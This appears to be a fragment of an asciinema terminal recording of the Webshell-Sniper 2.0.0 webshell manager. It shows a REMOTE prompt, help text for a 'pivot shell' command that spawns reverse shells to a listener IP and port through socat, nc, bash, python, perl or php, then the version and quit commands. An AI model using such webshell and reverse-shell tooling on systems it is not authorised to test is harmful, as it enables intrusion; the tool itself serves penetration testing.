[27.3736, "o", "\u001b[?25l\u001b[?7l\b\u001b[0;31m--\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.4356, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mh\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.4979, "o", "\u001b[?25l\u001b[?7l\u001b[0;31me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.5603, "o", "\u001b[?25l\u001b[?7l\u001b[0;31ml\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.6221, "o", "\u001b[?25l\u001b[?7l\u001b[0;31mp\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.6839, "o", "\u001b[?25l\u001b[?7l\u001b[31D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mpivot\u001b[0m \u001b[0;33mshell\u001b[0m \u001b[0;31m--help\u001b[31D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[27.6862, "o", "\u001b[38;5;208mUsage:\u001b[0m \u001b[38;5;244mpivot shell\u001b[0m [\u001b[36m-h\u001b[0m] [\u001b[36m-i\u001b[0m \u001b[38;5;36mIP\u001b[0m] [\u001b[36m-p\u001b[0m \u001b[38;5;36mPORT\u001b[0m] [\u001b[36m-m\u001b[0m \u001b[38;5;36m{auto,socat,nc,bash,python,perl,php}\u001b[0m] [\u001b[36m--listen\u001b[0m]\r\n                   [\u001b[36m--tool\u001b[0m \u001b[38;5;36m{nc,socat}\u001b[0m]\r\n\r\n\u001b[38;5;208mOptions:\u001b[0m\r\n  \u001b[36m-h\u001b[0m, \u001b[36m--help\u001b[0m            \u001b[39mshow this help message and exit\u001b[0m\r\n  \u001b[36m-i\u001b[0m, \u001b[36m--ip\u001b[0m \u001b[38;5;36mIP\u001b[0m           \u001b[39mlistener IP\u001b[0m\r\n  \u001b[36m-p\u001b[0m, \u001b[36m--port\u001b[0m \u001b[38;5;36mPORT\u001b[0m       \u001b[39mlistener port\u001b[0m\r\n  \u001b[36m-m\u001b[0m, \u001b[36m--method\u001b[0m \u001b[38;5;36m{auto,socat,nc,bash,python,perl,php}\u001b[0m\r\n  \u001b[36m--listen\u001b[0m              \u001b[39mspawn a local listener first\u001b[0m\r\n  \u001b[36m--tool\u001b[0m \u001b[38;5;36m{nc,socat}\u001b[0m     \u001b[39mlocal listener tool\u001b[0m\r\n\r\n"]
[27.6867, "o", "\u001b[6n"]
[27.6873, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[27.6879, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.2841, "o", "\u001b[?25l\u001b[?7l\u001b[0mv\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.346, "o", "\u001b[?25l\u001b[?7l\u001b[0me\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.4083, "o", "\u001b[?25l\u001b[?7l\u001b[0mr\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.4708, "o", "\u001b[?25l\u001b[?7l\u001b[0ms\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.5327, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.5946, "o", "\u001b[?25l\u001b[?7l\u001b[0mo\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.6564, "o", "\u001b[?25l\u001b[?7l\u001b[6D\u001b[0;32mversion\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.7182, "o", "\u001b[?25l\u001b[?7l\u001b[20D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mversion\u001b[20D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[30.7188, "o", "\u001b[1;32m[+] Webshell-Sniper 2.0.0\u001b[0m\r\n"]
[30.7194, "o", "\u001b[6n"]
[30.72, "o", "\u001b[?2004h\u001b[?25l\u001b[0m\u001b[?7l\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ >\u001b[12D\u001b[13C\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[30.7207, "o", "\u001b[?25l\u001b[?7l\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.3335, "o", "\u001b[?25l\u001b[?7l\u001b[0mq\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.3966, "o", "\u001b[?25l\u001b[?7l\u001b[0mu\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.4588, "o", "\u001b[?25l\u001b[?7l\u001b[0mi\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.5204, "o", "\u001b[?25l\u001b[?7l\u001b[3D\u001b[0;32mquit\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h"]
[32.5819, "o", "\u001b[?25l\u001b[?7l\u001b[17D\u001b[0m\u001b[J\u001b[0;30;42;1m REMOTE \u001b[0m ~ > \u001b[0;32mquit\u001b[17D\u001b[0m\r\r\n\u001b[J\u001b[?7h\u001b[0m\u001b[?12l\u001b[?25h\u001b[?2004l"]
[32.5827, "o", "\u001b[95m[+] Saved session (1 shell(s)) to \u001b[0m\r\n\u001b[95m/home/ubuntu/Documents/dev/WangYihang/Webshell-Sniper/session_1782486014.json\u001b[0m\r\n"]
